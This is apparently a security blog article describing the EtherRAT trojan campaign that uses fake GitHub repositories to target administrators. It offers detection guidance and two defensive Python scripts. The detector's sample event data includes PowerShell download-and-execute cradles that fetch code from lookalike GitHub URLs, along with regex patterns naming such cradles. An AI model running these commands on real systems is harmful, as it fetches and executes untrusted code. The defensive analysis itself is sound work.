EtherRAT Malware: How Attackers Use Fake GitHub Repositories to Target Sysadmins and DevOps

Last updated: 2026-05-01 12:38:49

Introduction

In March 2026, the Atos Threat Research Center (TRC) uncovered a sophisticated malware campaign that combines social engineering with technical deception. Dubbed EtherRAT, this remote access trojan is being distributed through carefully crafted GitHub repositories that impersonate legitimate administrative tools. The attackers specifically target high-privilege professionals such as enterprise administrators, DevOps engineers, and security analysts, exploiting their reliance on trusted utilities to gain initial access and maintain persistence.

Source: feeds.feedburner.com

The EtherRAT Campaign: A Sophisticated Threat

EtherRAT is a remote access trojan built with unusual attention to operational security and resilience. It is designed to evade signature-based antivirus and relies on encryption and obfuscation, described in the technical analysis below. The campaign borrows GitHub's reputation as a trusted code host, creating fake profiles and projects that mimic well-known administrative tooling such as the Sysinternals suite, Puppet modules, or Ansible scripts.

Key Characteristics

  • SEO Manipulation: The attackers integrate search engine optimization (SEO) tactics to ensure their malicious repositories appear at the top of search results when users look for administrative utilities.
  • Fabricated Credibility Signals: The GitHub accounts are often dressed up with realistic commit histories, stars, and forks to simulate trustworthiness, so these signals cannot be relied on when vetting a repository.
  • Multi-Stage Payload: The initial download triggers a chain that downloads the main EtherRAT binary from a command-and-control server.

How the Attack Works: Impersonating Trusted Administrative Tools

The attack begins with the victim searching for a specific administrative tool, such as a network scanning utility or automation script. The attackers have created dozens of GitHub repositories that appear exactly like the real ones, including identical descriptions, documentation, and even similar repository names. For example, a fake repository might be named sysinternals-ps or ansible-windows-update.

Once the victim lands on the fake GitHub page, they are presented with a convincing README that includes installation instructions and release notes. The download link points to a .zip archive or a .ps1 script; running the script (or the contents of the archive) starts the multi-stage chain that fetches the EtherRAT binary from the command-and-control server. The malware then establishes persistence, typically by creating scheduled tasks or registry Run keys.

The Role of SEO and Fake GitHub Repositories

SEO manipulation is central to the campaign's success. The attackers use keyword stuffing, backlinks from compromised sites, and fake reviews and engagement to push the repositories up the rankings. Many victims are security professionals who would normally scrutinize such sources, but the sheer volume of fake repositories and their polished presentation often get past that scrutiny.

“We observed over 200 distinct GitHub accounts involved in this operation, with many sharing identical code templates and communication patterns,” reports the Atos TRC team.

Target Audience: High-Privilege Users

EtherRAT specifically targets accounts with elevated permissions. Enterprise administrators, DevOps engineers, and security analysts are prime targets because they have access to critical systems and sensitive data. By compromising these accounts, attackers can move laterally within the network, escalate privileges, and deploy additional malware such as ransomware or keyloggers.


Technical Analysis and Detection

The EtherRAT binary is a .NET executable heavily obfuscated with ConfuserEx. It uses AES-256 to encrypt C2 communication and, according to the report, employs a polymorphic routine that changes its file signature after each execution, so static hashes alone are a weak detection signal. Detection is challenging, but there are indicators of compromise (IoCs) that security teams can monitor:

  • Unusual GitHub Account Patterns: Look for recently created accounts whose repositories carry stars, forks, or follower counts out of proportion to their age and activity.
  • File Hashes: The malware has known SHA256 hashes (available in the full Atos TRC report); treat them as a starting point given the polymorphism noted above.
  • Network Traffic: Outbound TLS sessions from administrative hosts to previously unseen endpoints that present self-signed certificates.

Detection in Enterprise Environments

Security teams should enable PowerShell script block logging (Microsoft-Windows-PowerShell/Operational, Event ID 4104) and module logging, forward those logs to the SIEM, and alert on script blocks that fetch content from github.com or raw.githubusercontent.com and hand it straight to Invoke-Expression or Start-Process. Persistence surfaces as scheduled task creation (Security Event ID 4698, once "Audit Other Object Access Events" is enabled) and Run-key writes (Sysmon Event ID 13). Wireshark or Zeek help characterize the TLS traffic to the C2 endpoints, while YARA rules match the payload on disk or in memory.
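The detection logic described above, as an added example that is not code from the Atos TRC report or any vendor product. It runs three checks over constructed Windows event records (the event IDs are the real ones; the field names are simplified stand-ins for the actual schemas): a PowerShell script block that downloads from GitHub and executes the result, a scheduled task whose action lives in a user-writable path, and a Run-key value pointing at a user-writable path. A final correlation step names hosts where both a download and a persistence write fired.

```python
"""EtherRAT-style detection over constructed Windows event records.
Added example; not code from the Atos TRC report. Field names are
simplified stand-ins for PowerShell 4104 (script block text), Security
4698 (scheduled task created) and Sysmon 13 (registry value set)."""
import re
from dataclasses import dataclass

# Constructed sample telemetry (not real logs). ops-ws02 shows the full
# chain: GitHub download, then a scheduled task and a Run key pointing at
# binaries in user-writable locations. ops-ws03 is benign noise.
SAMPLE_EVENTS = [
    {"id": 4104, "host": "ops-ws01", "user": "CORP\\jdoe",
     "script": "Write-Host 'hello'"},
    {"id": 4104, "host": "ops-ws01", "user": "CORP\\jdoe",
     "script": "IEX (New-Object Net.WebClient).DownloadString("
               "'https://raw.githubusercontent.com/sysinternals-ps/tools/main/install.ps1')"},
    {"id": 4104, "host": "ops-ws02", "user": "CORP\\admin",
     "script": "Invoke-WebRequest https://github.com/ansible-windows-update/ansible/"
               "releases/download/v1/update.zip -OutFile $env:TEMP\\update.zip; "
               "Expand-Archive $env:TEMP\\update.zip; Start-Process $env:TEMP\\update\\update.exe"},
    {"id": 4698, "host": "ops-ws02", "user": "CORP\\admin",
     "task_name": "\\Microsoft\\Windows\\UpdateCheck",
     "command": "C:\\Users\\admin\\AppData\\Roaming\\svchost.exe"},
    {"id": 4698, "host": "ops-ws03", "user": "SYSTEM",
     "task_name": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "command": "%windir%\\system32\\defrag.exe"},
    {"id": 13, "host": "ops-ws02", "user": "CORP\\admin",
     "target": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
     "details": "C:\\Users\\admin\\AppData\\Local\\Temp\\update\\update.exe"},
]

GITHUB_URL = re.compile(
    r"https?://(?:raw\.githubusercontent\.com|github\.com|objects\.githubusercontent\.com)/", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|\bcurl\b|\bwget\b", re.I)
EXEC_SINK = re.compile(r"\bIEX\b|Invoke-Expression|Start-Process|Expand-Archive", re.I)
# Locations a non-admin dropper can write to; a task or Run key pointing here is suspect.
USER_WRITABLE = re.compile(r"\\(?:Users\\[^\\]+\\AppData|ProgramData|Windows\\Temp)\\", re.I)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.I)


@dataclass(frozen=True)
class Alert:
    host: str
    user: str
    rule: str
    detail: str


def check_script_block(ev):
    """4104: GitHub-hosted content fetched by a download cradle, worse if executed."""
    text = ev["script"]
    if not (GITHUB_URL.search(text) and DOWNLOAD_CRADLE.search(text)):
        return None
    rule = "github_download_and_execute" if EXEC_SINK.search(text) else "github_download"
    return Alert(ev["host"], ev["user"], rule, text[:120])


def check_scheduled_task(ev):
    """4698: new scheduled task whose action is a binary in a user-writable path."""
    if USER_WRITABLE.search(ev["command"]):
        return Alert(ev["host"], ev["user"], "persistence_task_user_writable",
                     f'{ev["task_name"]} -> {ev["command"]}')
    return None


def check_registry(ev):
    """Sysmon 13: Run/RunOnce value set to a binary in a user-writable path."""
    if RUN_KEY.search(ev["target"]) and USER_WRITABLE.search(ev["details"]):
        return Alert(ev["host"], ev["user"], "persistence_runkey_user_writable",
                     f'{ev["target"]} = {ev["details"]}')
    return None


CHECKS = {4104: check_script_block, 4698: check_scheduled_task, 13: check_registry}


def detect(events):
    """Run every applicable check and return the alerts in event order."""
    alerts = []
    for ev in events:
        check = CHECKS.get(ev["id"])
        if check is not None:
            alert = check(ev)
            if alert is not None:
                alerts.append(alert)
    return alerts


def correlate(alerts):
    """Hosts where a GitHub download and a persistence write both fired."""
    downloads = {a.host for a in alerts if a.rule.startswith("github_download")}
    persistence = {a.host for a in alerts if a.rule.startswith("persistence_")}
    return downloads & persistence


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for a in found:
        print(f"{a.host:9} {a.user:12} {a.rule:34} {a.detail}")
    print("hosts with download + persistence:", sorted(correlate(found)))
```

The single-event rules are noisy on their own (plenty of legitimate automation pulls scripts from GitHub), which is why the correlation step matters: a host that downloads from GitHub and then gains a task or Run key in %APPDATA% or %TEMP% within the same window is the pattern worth paging on.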

Mitigation and Best Practices

To defend against EtherRAT and similar campaigns, organizations should adopt the following measures:

  1. Verify GitHub Repositories: Do not rely on stars and forks, which this campaign fabricates. Confirm that the owning organization is the vendor's own (Sysinternals ships from Microsoft, Ansible from the ansible organization), review the contributor and commit history, and compare release hashes or signatures against the vendor's published values before running anything.
  2. Restrict Script Execution: Set the PowerShell execution policy to AllSigned via Group Policy, but treat it as a guardrail rather than a security boundary: it is bypassed with -ExecutionPolicy Bypass or by piping script text into powershell.exe. Pair it with script block logging and, where AppLocker or WDAC is enforced, PowerShell Constrained Language Mode.
  3. Implement Application Allowlisting: Use AppLocker or Windows Defender Application Control to allow only approved administrative tools in sensitive environments and to block unsigned executables launched from user-writable locations such as %APPDATA% and %TEMP%, where a first-stage dropper typically lands.
  4. User Education: Train high-privilege users to spot fake GitHub repositories and phishing pages, and give them a sanctioned internal mirror of approved tools so they are not searching the web for them.
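Two of the checks from step 1 in code, as an added example that is not part of the Atos report or any vendor tooling. The first flags a repository URL as a lookalike when its owner or repository name resembles a known administrative tool (including one-character typos) but the owner is not the tool's real organization, which also catches the sysinternals-ps and ansible-windows-update style names described earlier. The second pins a downloaded artifact to a published SHA256 value. The canonical-owner table and the sample release bytes are constructed assumptions; a real deployment would maintain the table from vendor documentation.

```python
"""Pre-download checks for vetting a GitHub repository and its release.
Added example; not code from the Atos TRC report or any project."""
import hashlib
import hmac
import re
from urllib.parse import urlparse

# Assumed canonical GitHub organizations for tools this campaign impersonates.
# Constructed for the example; maintain from vendor documentation in practice.
CANONICAL = {
    "sysinternals": {"sysinternals", "microsoft"},
    "ansible": {"ansible", "ansible-collections"},
    "puppet": {"puppetlabs"},
}


def _levenshtein(a, b):
    """Plain edit distance; enough to catch single-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def _tokens(name):
    return [t for t in re.split(r"[-_.\s]+", name.lower()) if t]


def impersonated_tool(name):
    """Return the canonical tool that an owner or repo name resembles, or None."""
    for tool in CANONICAL:
        for tok in _tokens(name):
            # exact token, or a near-miss on a token long enough to be meaningful
            if tok == tool or (len(tok) >= 5 and _levenshtein(tok, tool) <= 1):
                return tool
    return None


def classify_repo(url):
    """Classify a repository URL as official, lookalike, unknown_tool, or not_github."""
    p = urlparse(url)
    if p.hostname not in ("github.com", "www.github.com"):
        return ("not_github", p.hostname or "")
    parts = [s for s in p.path.split("/") if s]
    if len(parts) < 2:
        return ("invalid", p.path)
    owner, repo = parts[0].lower(), parts[1].lower()
    tool = impersonated_tool(repo) or impersonated_tool(owner)
    if tool is None:
        return ("unknown_tool", f"{owner}/{repo}")
    if owner in CANONICAL[tool]:
        return ("official", tool)
    return ("lookalike",
            f"{owner}/{repo} resembles {tool} but owner is not one of {sorted(CANONICAL[tool])}")


def verify_artifact(data, expected_sha256):
    """Constant-time comparison of a downloaded artifact against a published SHA256."""
    digest = hashlib.sha256(data).hexdigest()
    return hmac.compare_digest(digest, expected_sha256.strip().lower())


# Constructed stand-ins for a genuine release archive, the hash the vendor
# publishes for it, and a copy with a first stage appended.
GENUINE_RELEASE = b"PK\x03\x04constructed-release-archive-bytes"
PUBLISHED_SHA256 = hashlib.sha256(GENUINE_RELEASE).hexdigest()
TAMPERED_RELEASE = GENUINE_RELEASE + b"\x00injected-stage-one"


if __name__ == "__main__":
    for u in ("https://github.com/ansible/ansible",
              "https://github.com/jdoe/sysinternals-ps",
              "https://github.com/sysinternals-ps/tools",
              "https://github.com/evil/puppett-modules",
              "https://github.com/alice/dotfiles"):
        print(u, "->", classify_repo(u))
    print("genuine ok:", verify_artifact(GENUINE_RELEASE, PUBLISHED_SHA256))
    print("tampered ok:", verify_artifact(TAMPERED_RELEASE, PUBLISHED_SHA256))
```

The classifier is deliberately biased toward false positives: any repository that trades on a tool's name outside the tool's own organization is worth a second look, even if it turns out to be a legitimate fork. The hash check only helps when the expected value comes from somewhere other than the page you are about to download from, such as the vendor's own site or an internal allowlist.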

Conclusion

The EtherRAT campaign highlights the evolving tactics of cybercriminals who exploit trust in open-source platforms. By impersonating administrative tools and using SEO manipulation, attackers have created a low-risk, high-reward method for compromising high-value targets. Organizations must remain vigilant, continuously monitor for suspicious GitHub activity, and reinforce security hygiene among privileged users.

For further reading, see the full report from Atos Threat Research Center (March 2026).